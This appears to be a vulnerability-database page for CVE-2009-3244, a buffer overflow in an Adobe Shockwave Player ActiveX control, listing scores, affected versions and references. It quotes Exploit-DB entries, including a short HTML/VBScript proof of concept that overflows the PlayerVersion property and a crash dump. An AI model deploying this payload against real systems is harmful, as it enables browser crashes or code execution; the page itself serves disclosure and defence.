CVE-2009-3244 : Detail

CVE-2009-3244

Overflow
46.11%V4
Network
2009-09-18
08h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Heap-based buffer overflow in the SwDir.dll ActiveX control in Adobe Shockwave Player 11.5.1.601 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long PlayerVersion property value.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 10093

Publication date : 2009-11-03 23h00 +00:00
Author : Francis Provencher
EDB Verified : Yes

<html> <object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object> <script language='vbscript'> argCount = 1 arg1=String(2097152, "A") ShockW.PlayerVersion = arg1 </script>
Exploit Database EDB-ID : 9682

Publication date : 2009-09-14 22h00 +00:00
Author : Francis Provencher
EDB Verified : Yes

##################################################################################### Application: Adobe ShockWave Player (11.5.1.601) Platforms: Windows XP Professional French SP2 and SP3 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher (Protek Research Lab's) ##################################################################################### 1) Introduction 2) Technical details and bug 3) The Code ##################################################################################### =============== 1) Introduction =============== Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. Shockwave Player displays Web content that has been created by Adobe Director. ##################################################################################### ============================ 2) Technical details ============================ Name: SwDir.dll Ver.: 11.5.1.601 CLSID: {233C1507-6A77-46A4-9443-F871F945D258} (d40.b20): Stack overflow - code c00000fd eax=00305004 ebx=00000003 ecx=00032f80 edx=00400000 esi=09ae0024 edi=00400002 eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202 ##################################################################################### # milw0rm.com [2009-09-15]

Products Mentioned

Configuraton 0

Adobe>>Shockwave_player >> Version To (including) 11.5.1.601

Adobe>>Shockwave_player >> Version 1.0

Adobe>>Shockwave_player >> Version 2.0

Adobe>>Shockwave_player >> Version 3.0

Adobe>>Shockwave_player >> Version 4.0

Adobe>>Shockwave_player >> Version 5.0

Adobe>>Shockwave_player >> Version 6.0

Adobe>>Shockwave_player >> Version 8.0

Adobe>>Shockwave_player >> Version 8.0.196

Adobe>>Shockwave_player >> Version 8.0.196a

Adobe>>Shockwave_player >> Version 8.0.204

Adobe>>Shockwave_player >> Version 8.0.205

Adobe>>Shockwave_player >> Version 8.5.1

Adobe>>Shockwave_player >> Version 8.5.1.100

Adobe>>Shockwave_player >> Version 8.5.1.103

Adobe>>Shockwave_player >> Version 8.5.1.105

Adobe>>Shockwave_player >> Version 8.5.1.106

Adobe>>Shockwave_player >> Version 8.5.321

Adobe>>Shockwave_player >> Version 8.5.323

Adobe>>Shockwave_player >> Version 8.5.324

Adobe>>Shockwave_player >> Version 8.5.325

Adobe>>Shockwave_player >> Version 9

Adobe>>Shockwave_player >> Version 9.0.383

Adobe>>Shockwave_player >> Version 9.0.432

Adobe>>Shockwave_player >> Version 10.0.0.210

Adobe>>Shockwave_player >> Version 10.0.1.004

Adobe>>Shockwave_player >> Version 10.1.0.11

Adobe>>Shockwave_player >> Version 10.1.0.011

Adobe>>Shockwave_player >> Version 10.1.1.016

Adobe>>Shockwave_player >> Version 10.1.4.020

Adobe>>Shockwave_player >> Version 10.2.0.021

Adobe>>Shockwave_player >> Version 10.2.0.022

Adobe>>Shockwave_player >> Version 10.2.0.023

Adobe>>Shockwave_player >> Version 11.0.0.456

Adobe>>Shockwave_player >> Version 11.0.3.471

Adobe>>Shockwave_player >> Version 11.5.0.595

Adobe>>Shockwave_player >> Version 11.5.0.596

Adobe>>Shockwave_player >> Version 11.5.2.602

Adobe>>Shockwave_player >> Version 11.5.6.606

Adobe>>Shockwave_player >> Version 11.5.7.609

Adobe>>Shockwave_player >> Version 11.5.8.612

References

http://www.securityfocus.com/bid/36905
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/9682
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2009/3134
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1023123
Tags : vdb-entry, x_refsource_SECTRACK
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.